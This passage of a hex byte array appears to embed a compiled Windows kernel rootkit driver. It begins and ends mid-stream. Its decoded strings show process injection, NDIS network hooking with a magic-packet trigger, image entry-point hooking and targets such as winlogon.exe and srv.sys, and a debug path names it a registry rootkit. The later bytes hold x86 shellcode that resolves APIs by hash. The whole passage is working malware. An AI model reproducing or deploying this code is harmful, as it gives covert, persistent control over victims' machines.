5,0x6e,0x61,0x62,0x6c,0x65,0x20,\r\n0x74,0x6f,0x20,0x66,0x69,0x6e,0x64,0x20,0x70,0x72,0x6f,0x63,0x65,0x73,0x73,0x20,\r\n0x22,0x25,0x77,0x73,0x22,0x0a,0x00,0x00,0x49,0x6e,0x6a,0x65,0x63,0x74,0x49,0x6e,\r\n0x74,0x6f,0x50,0x72,0x6f,0x63,0x65,0x73,0x73,0x42,0x79,0x49,0x64,0x28,0x29,0x20,\r\n0x45,0x52,0x52,0x4f,0x52,0x3a,0x20,0x55,0x6e,0x61,0x62,0x6c,0x65,0x20,0x74,0x6f,\r\n0x20,0x66,0x69,0x6e,0x64,0x20,0x70,0x72,0x6f,0x63,0x65,0x73,0x73,0x20,0x50,0x49,\r\n0x44,0x3d,0x25,0x64,0x0a,0x00,0x00,0x00,0x49,0x6e,0x6a,0x65,0x63,0x74,0x49,0x6e,\r\n0x69,0x74,0x69,0x61,0x6c,0x69,0x7a,0x65,0x28,0x29,0x20,0x45,0x52,0x52,0x4f,0x52,\r\n0x3a,0x20,0x55,0x6e,0x6b,0x6e,0x6f,0x77,0x6e,0x20,0x4e,0x54,0x20,0x76,0x65,0x72,\r\n0x73,0x69,0x6f,0x6e,0x0a,0x00,0x00,0x00,0x4e,0x74,0x5
0,0x72,0x6f,0x74,0x65,0x63,\r\n0x74,0x56,0x69,0x72,0x74,0x75,0x61,0x6c,0x4d,0x65,0x6d,0x6f,0x72,0x79,0x28,0x29,\r\n0x20,0x53,0x44,0x54,0x20,0x6e,0x75,0x6d,0x62,0x65,0x72,0x20,0x69,0x73,0x20,0x30,\r\n0x78,0x25,0x78,0x0a,0x00,0x00,0x00,0x00,0x4e,0x64,0x69,0x73,0x48,0x6f,0x6f,0x6b,\r\n0x49,0x6e,0x69,0x74,0x69,0x61,0x6c,0x69,0x7a,0x65,0x28,0x29,0x20,0x45,0x52,0x52,\r\n0x4f,0x52,0x3a,0x20,0x4e,0x44,0x49,0x53,0x20,0x76,0x65,0x72,0x73,0x69,0x6f,0x6e,\r\n0x20,0x30,0x78,0x25,0x78,0x20,0x69,0x73,0x20,0x6e,0x6f,0x74,0x20,0x73,0x75,0x70,\r\n0x70,0x6f,0x72,0x74,0x65,0x64,0x0a,0x00,0x2e,0x74,0x65,0x78,0x74,0x00,0x00,0x00,\r\n0x54,0x00,0x43,0x00,0x50,0x00,0x49,0x00,0x50,0x00,0x00,0x00,0x4e,0x64,0x69,0x73,\r\n0x48,0x6f,0x6f,0x6b,0x53,0x65,0x74,0x28,0x29,0x3a,0x20,0x22,0x54,0x43,0x50,0x49,\r\n0x50,0x22,0x20,0x70,0x72,0x6f,0x74,0x6f,0x63,0x6f,0x6c,0x20,0x61,0x64,0x64,0x72,\r\n0x65,0x73,0x73,0x20,0x69,0x73,0x20,0x30,0x78,0x25,0x2e,0x38,0x78,0x0a,0x00,0x00,\r\n0x4e,0x64,0x69,0x73,0x48,0x6f,0x6f,0x6b,0x53,0x65,0x74,0x28,0x29,0x3a,0x20,0x4f,\r\n0x70,0x65,0x6e,0x20,0x62,0x6c,0x6f,0x63,0x6b,0x20,0x3d,0x20,0x30,0x78,0x25,0x2e,\r\n0x38,0x78,0x2c,0x20,0x4d,0x69,0x6e,0x69,0x70,0x6f,0x72,0x74,0x20,0x3d,0x20,0x30,\r\n0x78,0x25,0x2e,0x38,0x78,0x0a,0x00,0x00,0x4e,0x64,0x69,0x73,0x48,0x6f,0x6f,0x6b,\r\n0x53,0x65,0x74,0x28,0x29,0x3a,0x20,0x48,0x6f,0x6f,0x6b,0x69,0x6e,0x67,0x20,0x4d,\r\n0x69,0x6e,0x69,0x70,0x6f,0x72,0x74,0x44,0x70,0x63,0x3a,0x20,0x30,0x78,0x25,0x2e,\r\n0x38,0x78,0x20,0x2d,0x3e,0x20,0x30,0x78,0x25,0x2e,0x38,0x78,0x0a,0x00,0x00,0x00,\r\n0x4e,0x64,0x69,0x73,0x48,0x6f,0x6f,0x6b,0x53,0x65,0x74,0x28,0x29,0x20,0x45,0x52,\r\n0x52,0x4f,0x52,0x3a,0x20,0x55,0x6e,0x61,0x62,0x6c,0x65,0x20,0x74,0x6f,0x20,0x66,\r\n0x69,0x6e,0x64,0x20,0x22,0x54,0x43,0x50,0x49,0x50,0x22,0x20,0x70,0x72,0x6f,0x74,\r\n0x6f,0x63,0x6f,0x6c,0x0a,0x00,0x00,0x00,0x25,0x64,0x2e,0x25,0x64,0x2e,0x25,0x64,\r\n0x2e,0x25,0x64,0x00,0x00,0x00,0x00,0x00,0x77,0x00,0x69,0x00,0x6e,0x00,0x6c,0x00,\r\n0x6f,0x00,0x67,0x00,0x6f,0x00,0x6e,0x
00,0x2e,0x00,0x65,0x00,0x78,0x00,0x65,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x4e,0x64,0x69,0x73,0x48,0x6f,0x6f,0x6b,\r\n0x48,0x61,0x6e,0x64,0x6c,0x65,0x42,0x75,0x66,0x66,0x65,0x72,0x28,0x29,0x20,0x49,\r\n0x50,0x3a,0x20,0x46,0x72,0x6f,0x6d,0x20,0x3d,0x20,0x25,0x73,0x2c,0x20,0x54,0x6f,\r\n0x20,0x3d,0x20,0x25,0x73,0x2c,0x20,0x50,0x72,0x6f,0x74,0x6f,0x63,0x6f,0x6c,0x20,\r\n0x3d,0x20,0x25,0x64,0x2c,0x20,0x4c,0x65,0x6e,0x67,0x74,0x68,0x20,0x3d,0x20,0x25,\r\n0x64,0x0a,0x00,0x00,0x52,0x4b,0x43,0x54,0x4c,0x3a,0x37,0x43,0x35,0x45,0x33,0x33,\r\n0x38,0x30,0x00,0x00,0x00,0x00,0x00,0x00,0x4e,0x64,0x69,0x73,0x48,0x6f,0x6f,0x6b,\r\n0x48,0x61,0x6e,0x64,0x6c,0x65,0x42,0x75,0x66,0x66,0x65,0x72,0x28,0x29,0x3a,0x20,\r\n0x4d,0x61,0x67,0x69,0x63,0x20,0x73,0x65,0x71,0x75,0x65,0x6e,0x63,0x65,0x20,0x68,\r\n0x61,0x73,0x20,0x62,0x65,0x65,0x6e,0x20,0x66,0x69,0x6e,0x64,0x20,0x69,0x6e,0x20,\r\n0x6e,0x65,0x74,0x77,0x6f,0x72,0x6b,0x20,0x70,0x61,0x63,0x6b,0x65,0x74,0x21,0x0a,\r\n0x00,0x00,0x00,0x00,0x50,0x73,0x43,0x72,0x65,0x61,0x74,0x65,0x53,0x79,0x73,0x74,\r\n0x65,0x6d,0x54,0x68,0x72,0x65,0x61,0x64,0x28,0x29,0x20,0x66,0x61,0x69,0x6c,0x73,\r\n0x3a,0x20,0x30,0x78,0x25,0x2e,0x38,0x78,0x0a,0x00,0x00,0x00,0x44,0x72,0x69,0x76,\r\n0x65,0x72,0x45,0x6e,0x74,0x72,0x79,0x43,0x6f,0x6e,0x74,0x69,0x6e,0x75,0x65,0x54,\r\n0x68,0x72,0x65,0x61,0x64,0x28,0x29,0x3a,0x20,0x50,0x61,0x72,0x61,0x6d,0x20,0x3d,\r\n0x20,0x30,0x78,0x25,0x2e,0x38,0x78,0x0a,0x00,0x00,0x00,0x00,0x45,0x78,0x41,0x6c,\r\n0x6c,0x6f,0x63,0x61,0x74,0x65,0x50,0x6f,0x6f,0x6c,0x28,0x29,0x20,0x66,0x61,0x69,\r\n0x6c,0x73,0x0a,0x00,0x4e,0x65,0x77,0x44,0x72,0x69,0x76,0x65,0x72,0x45,0x6e,0x74,\r\n0x72,0x79,0x28,0x29,0x3a,0x20,0x48,0x6f,0x6f,0x6b,0x65,0x64,0x20,0x64,0x72,0x69,\r\n0x76,0x65,0x72,0x20,0x72,0x65,0x74,0x75,0x72,0x6e,0x73,0x20,0x30,0x78,0x25,0x2e,\r\n0x38,0x78,0x0a,0x00,0x4e,0x65,0x77,0x44,0x72,0x69,0x76,0x65,0x72,0x45,0x6e,0x74,\r\n0x72,0x79,0x28,0x29,0x3a,0x20,0x53,0x74,0x61,0x72,0x74,0x20,0x61,0x64,0x64,0x72,\r\n0x65,0x73,0x73,0x3a,0
x20,0x30,0x78,0x25,0x2e,0x38,0x78,0x0a,0x00,0x00,0x00,0x00,\r\n0x50,0x73,0x43,0x72,0x65,0x61,0x74,0x65,0x53,0x79,0x73,0x74,0x65,0x6d,0x54,0x68,\r\n0x72,0x65,0x61,0x64,0x28,0x29,0x20,0x66,0x61,0x69,0x6c,0x73,0x3a,0x20,0x30,0x78,\r\n0x25,0x2e,0x38,0x78,0x0a,0x00,0x00,0x00,0x48,0x6f,0x6f,0x6b,0x49,0x6d,0x61,0x67,\r\n0x65,0x45,0x6e,0x74,0x72,0x79,0x28,0x29,0x3a,0x20,0x49,0x6d,0x61,0x67,0x65,0x20,\r\n0x65,0x6e,0x74,0x72,0x79,0x20,0x70,0x6f,0x69,0x6e,0x74,0x20,0x68,0x6f,0x6f,0x6b,\r\n0x65,0x64,0x20,0x28,0x30,0x78,0x25,0x2e,0x38,0x78,0x20,0x2d,0x3e,0x20,0x30,0x78,\r\n0x25,0x2e,0x38,0x78,0x29,0x0a,0x00,0x00,0x49,0x4e,0x49,0x54,0x00,0x00,0x00,0x00,\r\n0x25,0x64,0x20,0x66,0x72,0x65,0x65,0x20,0x62,0x79,0x74,0x65,0x73,0x20,0x61,0x74,\r\n0x20,0x30,0x78,0x25,0x2e,0x38,0x78,0x0a,0x00,0x00,0x00,0x00,0x5c,0x00,0x48,0x00,\r\n0x54,0x00,0x54,0x00,0x50,0x00,0x2e,0x00,0x73,0x00,0x79,0x00,0x73,0x00,0x00,0x00,\r\n0x5c,0x00,0x6d,0x00,0x72,0x00,0x78,0x00,0x73,0x00,0x6d,0x00,0x62,0x00,0x2e,0x00,\r\n0x73,0x00,0x79,0x00,0x73,0x00,0x00,0x00,0x5c,0x00,0x6d,0x00,0x72,0x00,0x78,0x00,\r\n0x73,0x00,0x6d,0x00,0x62,0x00,0x31,0x00,0x30,0x00,0x2e,0x00,0x73,0x00,0x79,0x00,\r\n0x73,0x00,0x00,0x00,0x5c,0x00,0x6d,0x00,0x72,0x00,0x78,0x00,0x73,0x00,0x6d,0x00,\r\n0x62,0x00,0x32,0x00,0x30,0x00,0x2e,0x00,0x73,0x00,0x79,0x00,0x73,0x00,0x00,0x00,\r\n0x5c,0x00,0x73,0x00,0x72,0x00,0x76,0x00,0x2e,0x00,0x73,0x00,0x79,0x00,0x73,0x00,\r\n0x00,0x00,0x00,0x00,0x5c,0x00,0x73,0x00,0x72,0x00,0x76,0x00,0x32,0x00,0x2e,0x00,\r\n0x73,0x00,0x79,0x00,0x73,0x00,0x00,0x00,0x5c,0x00,0x73,0x00,0x65,0x00,0x63,0x00,\r\n0x64,0x00,0x72,0x00,0x76,0x00,0x2e,0x00,0x73,0x00,0x79,0x00,0x73,0x00,0x00,0x00,\r\n0x4c,0x6f,0x61,0x64,0x49,0x6d,0x61,0x67,0x65,0x4e,0x6f,0x74,0x69,0x66,0x79,0x28,\r\n0x29,0x3a,0x20,0x27,0x25,0x77,0x5a,0x27,0x20,0x69,0x73,0x20,0x61,0x74,0x20,0x30,\r\n0x78,0x25,0x2e,0x38,0x78,0x2c,0x20,0x73,0x69,0x7a,0x65,0x3d,0x25,0x64,0x0a,0x00,\r\n0x44,0x72,0x69,0x76,0x65,0x72,0x45,0x6e,0x74,0x72,0x79,0x28,0x29,0x3a,0x20,0x4c,\r\n0x6f,
0x61,0x64,0x65,0x64,0x20,0x61,0x74,0x20,0x30,0x78,0x25,0x2e,0x38,0x78,0x0a,\r\n0x00,0x00,0x00,0x00,0x52,0x6f,0x6f,0x74,0x6b,0x69,0x74,0x20,0x63,0x6f,0x64,0x65,\r\n0x3a,0x20,0x30,0x78,0x25,0x78,0x20,0x62,0x79,0x74,0x65,0x73,0x20,0x66,0x72,0x6f,\r\n0x6d,0x20,0x30,0x78,0x25,0x2e,0x38,0x78,0x0a,0x00,0x00,0x00,0x50,0x73,0x53,0x65,\r\n0x74,0x4c,0x6f,0x61,0x64,0x49,0x6d,0x61,0x67,0x65,0x4e,0x6f,0x74,0x69,0x66,0x79,\r\n0x52,0x6f,0x75,0x74,0x69,0x6e,0x65,0x28,0x29,0x20,0x66,0x61,0x69,0x6c,0x73,0x3a,\r\n0x20,0x30,0x78,0x25,0x2e,0x38,0x78,0x0a,0x00,0x00,0x00,0x00,0x45,0x78,0x41,0x6c,\r\n0x6c,0x6f,0x63,0x61,0x74,0x65,0x50,0x6f,0x6f,0x6c,0x28,0x29,0x20,0x66,0x61,0x69,\r\n0x6c,0x73,0x0a,0x00,0x5a,0x77,0x51,0x75,0x65,0x72,0x79,0x53,0x79,0x73,0x74,0x65,\r\n0x6d,0x49,0x6e,0x66,0x6f,0x72,0x6d,0x61,0x74,0x69,0x6f,0x6e,0x28,0x29,0x20,0x66,\r\n0x61,0x69,0x6c,0x73,0x3b,0x20,0x73,0x74,0x61,0x74,0x75,0x73,0x3a,0x20,0x30,0x78,\r\n0x25,0x2e,0x38,0x78,0x0a,0x00,0x00,0x00,0x68,0x00,0x61,0x00,0x6c,0x00,0x2e,0x00,\r\n0x64,0x00,0x6c,0x00,0x6c,0x00,0x00,0x00,0x6e,0x00,0x74,0x00,0x6f,0x00,0x73,0x00,\r\n0x6b,0x00,0x72,0x00,0x6e,0x00,0x6c,0x00,0x2e,0x00,0x65,0x00,0x78,0x00,0x65,0x00,\r\n0x00,0x00,0x00,0x00,0x68,0x00,0x61,0x00,0x6c,0x00,0x2e,0x00,0x64,0x00,0x6c,0x00,\r\n0x6c,0x00,0x00,0x00,0x68,0x00,0x61,0x00,0x6c,0x00,0x61,0x00,0x63,0x00,0x70,0x00,\r\n0x69,0x00,0x2e,0x00,0x64,0x00,0x6c,0x00,0x6c,0x00,0x00,0x00,0x68,0x00,0x61,0x00,\r\n0x6c,0x00,0x61,0x00,0x70,0x00,0x69,0x00,0x63,0x00,0x2e,0x00,0x64,0x00,0x6c,0x00,\r\n0x6c,0x00,0x00,0x00,0x68,0x00,0x61,0x00,0x6c,0x00,0x6d,0x00,0x70,0x00,0x73,0x00,\r\n0x2e,0x00,0x64,0x00,0x6c,0x00,0x6c,0x00,0x00,0x00,0x00,0x00,0x68,0x00,0x61,0x00,\r\n0x6c,0x00,0x61,0x00,0x61,0x00,0x63,0x00,0x70,0x00,0x69,0x00,0x2e,0x00,0x64,0x00,\r\n0x6c,0x00,0x6c,0x00,0x00,0x00,0x00,0x00,0x68,0x00,0x61,0x00,0x6c,0x00,0x6d,0x00,\r\n0x61,0x00,0x63,0x00,0x70,0x00,0x69,0x00,0x2e,0x00,0x64,0x00,0x6c,0x00,0x6c,0x00,\r\n0x00,0x00,0x00,0x00,0x6e,0x00,0x74,0x00,0x6f,0x00,0x73,0x00,0x6b,0x00,0x7
2,0x00,\r\n0x6e,0x00,0x6c,0x00,0x2e,0x00,0x65,0x00,0x78,0x00,0x65,0x00,0x00,0x00,0x00,0x00,\r\n0x6e,0x00,0x74,0x00,0x6b,0x00,0x72,0x00,0x6e,0x00,0x6c,0x00,0x70,0x00,0x61,0x00,\r\n0x2e,0x00,0x65,0x00,0x78,0x00,0x65,0x00,0x00,0x00,0x00,0x00,0x6e,0x00,0x74,0x00,\r\n0x6b,0x00,0x72,0x00,0x6e,0x00,0x6c,0x00,0x6d,0x00,0x70,0x00,0x2e,0x00,0x65,0x00,\r\n0x78,0x00,0x65,0x00,0x00,0x00,0x00,0x00,0x6e,0x00,0x74,0x00,0x6b,0x00,0x72,0x00,\r\n0x70,0x00,0x61,0x00,0x6d,0x00,0x70,0x00,0x2e,0x00,0x65,0x00,0x78,0x00,0x65,0x00,\r\n0x00,0x00,0x00,0x00,0x6e,0x74,0x6f,0x73,0x6b,0x72,0x6e,0x6c,0x2e,0x65,0x78,0x65,\r\n0x00,0x00,0x00,0x00,0x52,0x75,0x6e,0x74,0x69,0x6d,0x65,0x49,0x6e,0x69,0x74,0x69,\r\n0x61,0x6c,0x69,0x7a,0x65,0x28,0x29,0x3a,0x20,0x4b,0x65,0x72,0x6e,0x65,0x6c,0x20,\r\n0x62,0x61,0x73,0x65,0x20,0x69,0x73,0x20,0x30,0x78,0x25,0x2e,0x38,0x78,0x0a,0x00,\r\n0x6e,0x64,0x69,0x73,0x2e,0x73,0x79,0x73,0x00,0x00,0x00,0x00,0x52,0x75,0x6e,0x74,\r\n0x69,0x6d,0x65,0x49,0x6e,0x69,0x74,0x69,0x61,0x6c,0x69,0x7a,0x65,0x28,0x29,0x3a,\r\n0x20,0x4e,0x44,0x49,0x53,0x20,0x62,0x61,0x73,0x65,0x20,0x69,0x73,0x20,0x30,0x78,\r\n0x25,0x2e,0x38,0x78,0x0a,0x00,0x00,0x00,0x6e,0x64,0x69,0x73,0x2e,0x73,0x79,0x73,\r\n0x00,0x00,0x00,0x00,0x52,0x75,0x6e,0x74,0x69,0x6d,0x65,0x49,0x6e,0x69,0x74,0x69,\r\n0x61,0x6c,0x69,0x7a,0x65,0x28,0x29,0x20,0x45,0x52,0x52,0x4f,0x52,0x3a,0x20,0x55,\r\n0x6e,0x61,0x62,0x6c,0x65,0x20,0x74,0x6f,0x20,0x6c,0x6f,0x63,0x61,0x74,0x65,0x20,\r\n0x4e,0x44,0x49,0x53,0x0a,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0xc0,0x2d,0x00,0x10,0x20,0x0f,0x00,0x10,0x01,0x00,0x00,0x00,\r\n0x52,0x53,0x44,0x53,0x30,0xf9,0x23,0x4b,0x06,0x74,0x2c,0x46,0x98,0xa0,0x13,0x7b,\r\n0x60,0xd0,0x84,0xd2,0x03,0x00,0x00,0x00,0x78,0x3a,0x5c,0x
64,0x65,0x76,0x5c,0x5f,\r\n0x65,0x78,0x70,0x6c,0x6f,0x69,0x74,0x73,0x5c,0x5f,0x4c,0x6f,0x63,0x61,0x6c,0x5c,\r\n0x57,0x69,0x6e,0x64,0x6f,0x77,0x73,0x52,0x65,0x67,0x69,0x73,0x74,0x72,0x79,0x52,\r\n0x6f,0x6f,0x74,0x6b,0x69,0x74,0x5c,0x73,0x72,0x63,0x5c,0x72,0x6f,0x6f,0x74,0x6b,\r\n0x69,0x74,0x5f,0x64,0x72,0x69,0x76,0x65,0x72,0x5f,0x64,0x65,0x62,0x75,0x67,0x2e,\r\n0x70,0x64,0x62,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x2a,0x2c,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x55,0x8b,0xec,0x5d,0xc2,0x14,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x5d,0xc2,0x0c,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x5d,0xc2,0x0c,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x5d,0xc3,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x5d,0xc2,0x08,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x5d,0xc2,0x08,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x5d,0xc2,0x0c,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x5d,0xc2,0x10,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x5d,0xc2,0x04,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x5d,0xc2,0x0c,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x5d,0xc2,0x10,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x33,0xc0,0x5d,0xc2,0x1c,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x5d,0xc2,0x04,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x33,0xc0,0x5d,0xc2,0x08,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x33,0xc0,0x5d,0xc2,0x08,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x33,0xc0,0x5d,0xc2,0x08,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x33,0xc0,0x5d,0xc2,0x08,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x83,0xec,0x7c,0x83,0x3d,0
xc8,0x2d,0x00,0x10,0x00,0x74,0x0a,0xa1,\r\n0xc8,0x2d,0x00,0x10,0xe9,0xd8,0x00,0x00,0x00,0xc7,0x45,0x84,0x00,0x00,0x00,0x00,\r\n0x6a,0x6c,0x6a,0x00,0x8d,0x45,0x90,0x50,0xe8,0x81,0x1b,0x00,0x00,0x83,0xc4,0x0c,\r\n0xc6,0x45,0x90,0x05,0xc6,0x45,0x91,0x00,0xc7,0x45,0x98,0x40,0x0f,0x00,0x10,0xc7,\r\n0x45,0x9c,0x70,0x0f,0x00,0x10,0xc7,0x45,0xa0,0xc0,0x0f,0x00,0x10,0xc7,0x45,0xa4,\r\n0xd0,0x0f,0x00,0x10,0xc7,0x45,0xa8,0x80,0x0f,0x00,0x10,0xc7,0x45,0xac,0x90,0x0f,\r\n0x00,0x10,0xc7,0x45,0xb0,0xe0,0x0f,0x00,0x10,0xc7,0x45,0xb4,0xf0,0x0f,0x00,0x10,\r\n0xc7,0x45,0xb8,0xa0,0x0f,0x00,0x10,0xc7,0x45,0xbc,0xb0,0x0f,0x00,0x10,0xc7,0x45,\r\n0xcc,0x30,0x0f,0x00,0x10,0xc7,0x45,0xd0,0x50,0x0f,0x00,0x10,0xc7,0x45,0xd8,0x60,\r\n0x0f,0x00,0x10,0xc7,0x45,0xc8,0x00,0x10,0x00,0x10,0xc7,0x45,0xd4,0x10,0x10,0x00,\r\n0x10,0x68,0x9c,0x03,0x00,0x10,0x8d,0x4d,0x88,0x51,0xff,0x15,0x20,0x03,0x00,0x10,\r\n0x8b,0x55,0x88,0x89,0x55,0xc0,0x8b,0x45,0x8c,0x89,0x45,0xc4,0x6a,0x6c,0x8d,0x4d,\r\n0x90,0x51,0x68,0xc8,0x2d,0x00,0x10,0x8d,0x55,0x84,0x52,0xff,0x15,0x84,0x02,0x00,\r\n0x10,0x83,0x7d,0x84,0x00,0x74,0x15,0x8b,0x45,0x84,0x50,0x68,0xb4,0x03,0x00,0x10,\r\n0xe8,0xbd,0x1a,0x00,0x00,0x83,0xc4,0x08,0x33,0xc0,0xeb,0x05,0xa1,0xc8,0x2d,0x00,\r\n0x10,0x8b,0xe5,0x5d,0xc3,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x51,0x83,0x3d,0xc8,0x2d,0x00,0x10,0x00,0x74,0x21,0xc7,0x45,0xfc,\r\n0x00,0x00,0x00,0x00,0xa1,0xc8,0x2d,0x00,0x10,0x50,0x8d,0x4d,0xfc,0x51,0xff,0x15,\r\n0x80,0x02,0x00,0x10,0xc7,0x05,0xc8,0x2d,0x00,0x10,0x00,0x00,0x00,0x00,0x8b,0xe5,\r\n0x5d,0xc3,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x83,0xec,0x0c,0x60,0xe8,0x00,0x00,0x00,0x00,0x5b,0x81,0xeb,0x8c,\r\n0x11,0x00,0x10,0xe8,0x6f,0x00,0x00,0x00,0x8b,0xf0,0x68,0xe8,0x60,0xbf,0x04,0x56,\r\n0xe8,0x84,0x00,0x00,0x00,0x6a,0x00,0x6a,0x00,0x8d,0x8b,0x3e,0x13,0x00,0x10,0x51,\r\n0xff,0xd0,0x8b,0xf0,0x68,0x89,0xfd,0x12,0xa4,0x56,0xe8,0x6a,0x00,0x00,0x00,0x89,\r\n0x45,0xfc,0x68,0x84,0x9b,
0x50,0xf2,0x56,0xe8,0x5c,0x00,0x00,0x00,0x89,0x45,0xf4,\r\n0xff,0x75,0xf4,0xff,0x75,0xfc,0x8b,0x45,0x08,0x50,0xe8,0xa3,0x00,0x00,0x00,0x89,\r\n0x45,0xf8,0x61,0x8b,0x45,0xf8,0x8b,0xe5,0x5d,0xc2,0x04,0x00,0x55,0x8b,0xec,0x8b,\r\n0x45,0x08,0x52,0x33,0xd2,0xc1,0xc2,0x03,0x32,0x10,0x40,0x80,0x38,0x00,0x75,0xf5,\r\n0x8b,0xc2,0x5a,0x5d,0xc2,0x04,0x00,0x56,0x33,0xc0,0x64,0xa1,0x30,0x00,0x00,0x00,\r\n0x78,0x0c,0x8b,0x40,0x0c,0x8b,0x70,0x1c,0xad,0x8b,0x40,0x08,0xeb,0x09,0x8b,0x40,\r\n0x34,0x8d,0x40,0x7c,0x8b,0x40,0x3c,0x5e,0xc3,0x55,0x8b,0xec,0x53,0x56,0x57,0x33,\r\n0xc0,0x8b,0x5d,0x0c,0x8b,0x75,0x08,0x8b,0xfe,0x03,0x76,0x3c,0x8b,0x4e,0x78,0x03,\r\n0xcf,0x8b,0x51,0x1c,0x52,0x8b,0x51,0x24,0x52,0x8b,0x71,0x20,0x03,0xf7,0x99,0x4a,\r\n0xad,0x42,0x03,0x45,0x08,0x50,0xe8,0x91,0xff,0xff,0xff,0x3b,0xc3,0x75,0xf1,0x8b,\r\n0x45,0x08,0x92,0x5e,0x03,0xf2,0xd1,0xe0,0x03,0xc6,0x33,0xc9,0x0f,0xb7,0x08,0x5f,\r\n0xc1,0xe1,0x02,0x03,0xca,0x03,0xcf,0x8b,0x01,0x03,0xc2,0x5f,0x5e,0x5b,0x5d,0xc2,\r\n0x08,0x00,0x55,0x8b,0xec,0x83,0xec,0x10,0x53,0x8b,0x5d,0x08,0x85,0xdb,0x56,0x57,\r\n0x0f,0x84,0xa4,0x00,0x00,0x00,0x8b,0x43,0x3c,0x8b,0xbc,0x18,0x80,0x00,0x00,0x00,\r\n0x03,0xfb,0xe9,0x80,0x00,0x00,0x00,0x8b,0x47,0x0c,0x03,0xc3,0x89,0x45,0xfc,0xff,\r\n0x75,0xfc,0xff,0x55,0x0c,0x89,0x45,0x08,0x83,0x7d,0x08,0x00,0x74,0x7c,0x83,0x7f,\r\n0x04,0xff,0x75,0x04,0x8b,0x07,0xeb,0x03,0x8b,0x47,0x10,0x89,0x45,0xfc,0x8d,0x34,\r\n0x18,0xeb,0x4c,0x8b,0x06,0xa9,0x00,0x00,0x00,0xf0,0x74,0x19,0x25,0xff,0xff,0x00,\r\n0x00,0x89,0x45,0xf8,0xff,0x75,0xf8,0xff,0x75,0x08,0xff,0x55,0x10,0x89,0x45,0xf4,\r\n0x8b,0x45,0xf4,0xeb,0x16,0x8d,0x44,0x18,0x02,0x89,0x45,0xf8,0xff,0x75,0xf8,0xff,\r\n0x75,0x08,0xff,0x55,0x10,0x89,0x45,0xf0,0x8b,0x45,0xf0,0x85,0xc0,0x89,0x06,0x74,\r\n0x29,0x8b,0x47,0x10,0x2b,0x45,0xfc,0x8b,0x0e,0x89,0x0c,0x30,0x83,0xc6,0x04,0x83,\r\n0x3e,0x00,0x75,0xaf,0x83,0xc7,0x14,0x83,0x3f,0x00,0x0f,0x85,0x77,0xff,0xff,0xff,\r\n0x33,0xc0,0x40,0x5f,0x5e,0x5b,0xc9,0xc2,0x0c,0x00,0x33,0xc0,0xeb,0xf5,0x6b,0x65,\r\n0x72,0x6e
